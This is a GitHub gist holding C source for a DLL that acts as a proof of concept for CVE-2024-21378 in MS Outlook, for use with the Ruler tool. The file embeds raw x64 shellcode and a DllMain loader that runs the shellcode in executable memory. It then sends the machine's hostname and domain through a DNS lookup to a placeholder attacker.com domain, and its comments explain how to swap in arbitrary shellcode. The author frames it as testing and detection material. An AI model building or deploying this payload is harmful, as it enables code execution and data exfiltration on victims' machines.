Skip to content

Instantly share code, notes, and snippets.

@infernalheaven
Forked from Homer28/test_dll.c
Created April 13, 2024 04:48
Show Gist options
  • Save infernalheaven/367686ba187bb2c6a1495be26e39f015 to your computer and use it in GitHub Desktop.
Save infernalheaven/367686ba187bb2c6a1495be26e39f015 to your computer and use it in GitHub Desktop.
DLL code for testing CVE-2024-21378 in MS Outlook
/**
* This DLL is designed for use in conjunction with the Ruler tool for
* security testing related to the CVE-2024-21378 vulnerability,
* specifically targeting MS Outlook.
*
* It can be used with the following command line syntax:
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
*
* After being loaded into MS Outlook, it sends the PC's hostname and
* domain name to a DNS resolver and then terminates its execution.
*
* Unauthorized use of the DLL for malicious activities is strictly
* prohibited and may violate applicable laws.
*
* The DLL can also be utilized by antivirus software developers for the
* purpose of developing and testing detection routines.
* It serves as a practical example for enhancing security measures against
* the CVE-2024-21378 vulnerability.
*
* Authors: @Homer28
* License: MIT
*
*/
#include <windns.h>
#include <windows.h>
#include <iostream>
/**
* We don't put an arbitrary code into DllMain because it will cause
* MS Outlook to freeze. Instead, our main payload will be
* a shellcode that we start in a separate thread.
*
* To create the shellcode, we will use the "easy_shellcode_generator" tool.
* URL: https://github.com/Homer28/easy_shellcode_generator
*
* Step-by-step instructions:
*
* 1. Install Visual Studio 2022.
* 2. Insert your C code into the shell_generator.cpp file.
* 3. Compile the project.
* 4. Use the pe_converter.py script to extract the shellcode,
* for example: py ./python/pe_converter.py "../bin/shell_generator.exe" "../bin/shellcode.h"
*
* This command can also be executed on Linux. Python3 and the Python3 pefile package are required.
*
* 5. Copy the content of shellcode.h below.
*
* The below content is the result of compiling following C code.
* int main(wchar_t *dns_str) {
* HMODULE mod_kernel32 = getKernel32_by_str();
*
* fnGetProcAddress myGetProcAddress = (fnGetProcAddress)getAPIAddr_byStr(mod_kernel32, "getprocaddress");
* fnLoadLibraryA myLoadLibrary = (fnLoadLibraryA)myGetProcAddress(mod_kernel32, "LoadLibraryA");
*
* HMODULE dnsLib = myLoadLibrary("DNSAPI.dll");
* fnDnsQuery_W myDnsQuery_W = (fnDnsQuery_W)myGetProcAddress(dnsLib, "DnsQuery_W");
*
* PDNS_RECORD dnsRecord;
*
* myDnsQuery_W(
* dns_str,
* DNS_TYPE_A,
* DNS_QUERY_STANDARD,
* NULL,
* &dnsRecord,
* NULL
* );
*
* return 0;
* }
*
*/
#if _WIN64
#define ptr_uint uint64_t
HANDLE g_threadH;
uint32_t payload_zx = 997;
uint32_t payload_EP_offset = 0x1A0;
unsigned char rawData[] = {
0xa0, 0x11, 0x00, 0x00, 0xcf, 0x13, 0x00, 0x00, 0xd0, 0x13, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x33, 0x32,
0x2e, 0x64, 0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x67, 0x65, 0x74, 0x70,
0x72, 0x6f, 0x63, 0x61, 0x64, 0x64, 0x72, 0x65, 0x73, 0x73, 0x00, 0x00,
0x4c, 0x6f, 0x61, 0x64, 0x4c, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41,
0x00, 0x00, 0x00, 0x00, 0x44, 0x4e, 0x53, 0x41, 0x50, 0x49, 0x2e, 0x64,
0x6c, 0x6c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x6e, 0x73, 0x51,
0x75, 0x65, 0x72, 0x79, 0x5f, 0x57, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xef, 0x38, 0x0c, 0x66, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00,
0x78, 0x00, 0x00, 0x00, 0xa4, 0x10, 0x00, 0x00, 0xa4, 0x02, 0x00, 0x00,
0x18, 0x00, 0x00, 0x00, 0x02, 0x80, 0x02, 0x80, 0x90, 0x10, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x94, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0xb5, 0x11, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x5c, 0x00, 0x00, 0x00,
0x20, 0x11, 0x00, 0x00, 0xc8, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x10, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x2e, 0x70, 0x64, 0x61,
0x74, 0x61, 0x00, 0x00, 0x10, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00,
0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x78, 0x10, 0x00, 0x00,
0x2c, 0x00, 0x00, 0x00, 0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x76,
0x6f, 0x6c, 0x74, 0x6d, 0x64, 0x00, 0x00, 0x00, 0xa4, 0x10, 0x00, 0x00,
0x7c, 0x00, 0x00, 0x00, 0x2e, 0x72, 0x64, 0x61, 0x74, 0x61, 0x24, 0x7a,
0x7a, 0x7a, 0x64, 0x62, 0x67, 0x00, 0x00, 0x00, 0x20, 0x11, 0x00, 0x00,
0xb0, 0x02, 0x00, 0x00, 0x2e, 0x74, 0x65, 0x78, 0x74, 0x24, 0x6d, 0x6e,
0x00, 0x00, 0x00, 0x00, 0xd0, 0x13, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00,
0x2e, 0x78, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x44, 0x0f, 0xb6, 0x01, 0x45, 0x84, 0xc0, 0x74, 0x1f, 0x41, 0x0f, 0xb6,
0xc0, 0x48, 0x2b, 0xca, 0x44, 0x0f, 0xb6, 0xc0, 0x3a, 0x02, 0x75, 0x10,
0x0f, 0xb6, 0x44, 0x11, 0x01, 0x48, 0xff, 0xc2, 0x44, 0x0f, 0xb6, 0xc0,
0x84, 0xc0, 0x75, 0xe8, 0x0f, 0xb6, 0x0a, 0x33, 0xd2, 0x8b, 0xc2, 0x44,
0x3a, 0xc1, 0x0f, 0x97, 0xc0, 0x0f, 0x92, 0xc2, 0x2b, 0xc2, 0xc3, 0xcc,
0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc,
0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0x0f, 0xb6, 0x02, 0x84,
0xc0, 0x74, 0x1a, 0x48, 0x2b, 0xd1, 0x66, 0x0f, 0x1f, 0x44, 0x00, 0x00,
0x88, 0x01, 0x48, 0x8d, 0x49, 0x01, 0x0f, 0xb6, 0x04, 0x0a, 0x84, 0xc0,
0x75, 0xf2, 0x88, 0x01, 0xc3, 0x88, 0x01, 0xc3, 0xcc, 0xcc, 0xcc, 0xcc,
0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
0x08, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x81,
0xec, 0x80, 0x01, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00,
0x00, 0x00, 0x4c, 0x8b, 0xf1, 0x48, 0x8b, 0x50, 0x18, 0x4c, 0x8b, 0x52,
0x18, 0x4d, 0x8b, 0xca, 0x0f, 0x1f, 0x40, 0x00, 0x4d, 0x8b, 0x09, 0x49,
0x83, 0x79, 0x30, 0x00, 0x0f, 0x84, 0x94, 0x00, 0x00, 0x00, 0x45, 0x0f,
0xb7, 0x41, 0x58, 0x33, 0xd2, 0x4d, 0x85, 0xc0, 0x74, 0x20, 0x66, 0x0f,
0x1f, 0x44, 0x00, 0x00, 0x48, 0x83, 0xfa, 0x40, 0x73, 0x14, 0x49, 0x8b,
0x41, 0x60, 0x0f, 0xb6, 0x0c, 0x50, 0x88, 0x4c, 0x14, 0x30, 0x48, 0xff,
0xc2, 0x49, 0x3b, 0xd0, 0x72, 0xe6, 0x0f, 0xb6, 0x44, 0x24, 0x30, 0x84,
0xc0, 0x74, 0x1c, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x8d, 0x48, 0xbf, 0x80,
0xf9, 0x19, 0x77, 0x04, 0x04, 0x20, 0x88, 0x02, 0x0f, 0xb6, 0x42, 0x01,
0x48, 0xff, 0xc2, 0x84, 0xc0, 0x75, 0xe9, 0x48, 0x8d, 0x0d, 0xda, 0xfd,
0xff, 0xff, 0xb2, 0x6b, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x49, 0x2b, 0xc8,
0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x0f, 0xb6, 0x00, 0x41, 0x3a, 0xd0,
0x75, 0x10, 0x0f, 0xb6, 0x54, 0x01, 0x01, 0x48, 0xff, 0xc0, 0x84, 0xd2,
0x75, 0xeb, 0x44, 0x0f, 0xb6, 0x00, 0x33, 0xc9, 0x41, 0x3a, 0xd0, 0x0f,
0x97, 0xc1, 0x33, 0xc0, 0x41, 0x3a, 0xd0, 0x0f, 0x92, 0xc0, 0x3b, 0xc8,
0x74, 0x09, 0x4d, 0x3b, 0xd1, 0x0f, 0x85, 0x55, 0xff, 0xff, 0xff, 0x49,
0x8b, 0x79, 0x30, 0x45, 0x33, 0xd2, 0x48, 0x63, 0x47, 0x3c, 0x8b, 0x8c,
0x38, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x5c, 0x39, 0x1c, 0x44, 0x8b, 0x5c,
0x39, 0x20, 0x8b, 0x6c, 0x39, 0x24, 0x4c, 0x03, 0xdf, 0x48, 0x03, 0xef,
0x48, 0x8d, 0x34, 0x1f, 0x85, 0xdb, 0x0f, 0x84, 0xb2, 0x00, 0x00, 0x00,
0x4c, 0x8d, 0x0d, 0x6d, 0xfd, 0xff, 0xff, 0x48, 0x8d, 0x44, 0x24, 0x70,
0x4c, 0x2b, 0xc8, 0x0f, 0x1f, 0x44, 0x00, 0x00, 0x41, 0x8b, 0x13, 0x48,
0x8d, 0x44, 0x24, 0x70, 0x48, 0x03, 0xd7, 0x0f, 0xb6, 0x0a, 0x84, 0xc9,
0x74, 0x1b, 0x4c, 0x8d, 0x44, 0x24, 0x70, 0x49, 0x2b, 0xd0, 0x66, 0x0f,
0x1f, 0x44, 0x00, 0x00, 0x88, 0x08, 0x48, 0xff, 0xc0, 0x0f, 0xb6, 0x0c,
0x02, 0x84, 0xc9, 0x75, 0xf3, 0x88, 0x08, 0x0f, 0xb6, 0x4c, 0x24, 0x70,
0x84, 0xc9, 0x74, 0x1f, 0x48, 0x8d, 0x54, 0x24, 0x70, 0x0f, 0x1f, 0x00,
0x8d, 0x41, 0xbf, 0x3c, 0x19, 0x77, 0x05, 0x80, 0xc1, 0x20, 0x88, 0x0a,
0x0f, 0xb6, 0x4a, 0x01, 0x48, 0xff, 0xc2, 0x84, 0xc9, 0x75, 0xe9, 0x48,
0x8d, 0x44, 0x24, 0x70, 0xb2, 0x67, 0x66, 0x90, 0x44, 0x0f, 0xb6, 0x00,
0x41, 0x3a, 0xd0, 0x75, 0x11, 0x41, 0x0f, 0xb6, 0x54, 0x01, 0x01, 0x48,
0xff, 0xc0, 0x84, 0xd2, 0x75, 0xea, 0x44, 0x0f, 0xb6, 0x00, 0x33, 0xc9,
0x41, 0x3a, 0xd0, 0x0f, 0x97, 0xc1, 0x33, 0xc0, 0x41, 0x3a, 0xd0, 0x0f,
0x92, 0xc0, 0x3b, 0xc8, 0x74, 0x73, 0x41, 0xff, 0xc2, 0x49, 0x83, 0xc3,
0x04, 0x44, 0x3b, 0xd3, 0x0f, 0x82, 0x62, 0xff, 0xff, 0xff, 0x33, 0xdb,
0x48, 0x8d, 0x15, 0xc9, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xcf, 0xff, 0xd3,
0x48, 0x8d, 0x0d, 0xcd, 0xfc, 0xff, 0xff, 0xff, 0xd0, 0x48, 0x8d, 0x15,
0xd4, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xc8, 0xff, 0xd3, 0x48, 0x8d, 0x8c,
0x24, 0xa8, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x20, 0xba, 0x01, 0x00, 0x00, 0x00,
0x49, 0x8b, 0xce, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xff, 0xd0, 0x4c,
0x8d, 0x9c, 0x24, 0x80, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x49, 0x8b, 0x5b,
0x20, 0x49, 0x8b, 0x6b, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5e, 0x5f, 0x5e,
0xc3, 0x42, 0x0f, 0xb7, 0x4c, 0x55, 0x00, 0x8b, 0x1c, 0x8e, 0x48, 0x03,
0xdf, 0xeb, 0x91, 0xcc, 0x01, 0x15, 0x09, 0x00, 0x15, 0x54, 0x36, 0x00,
0x15, 0x34, 0x34, 0x00, 0x15, 0x01, 0x30, 0x00, 0x0e, 0xe0, 0x0c, 0x70,
0xb};
#else
#endif
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH: {
std::wstring dns_resolve_address = L"new.d%USERDOMAIN%.u%COMPUTERNAME%.attacker.com";
wchar_t dns_name[MAX_PATH];
if (ExpandEnvironmentStringsW(dns_resolve_address.c_str(), dns_name,
MAX_PATH)) {
LPVOID payload_memory = VirtualAlloc(
NULL, payload_zx, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (payload_memory) {
memcpy_s(payload_memory, payload_zx, rawData, payload_zx);
wchar_t* dns_name_allocated = (wchar_t*)VirtualAlloc(
NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
wcscpy_s(dns_name_allocated, MAX_PATH, dns_name);
g_threadH = CreateThread(
NULL, 0,
(LPTHREAD_START_ROUTINE)((ptr_uint)payload_memory +
(ptr_uint)payload_EP_offset),
dns_name_allocated, 0, NULL);
}
}
break;
}
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment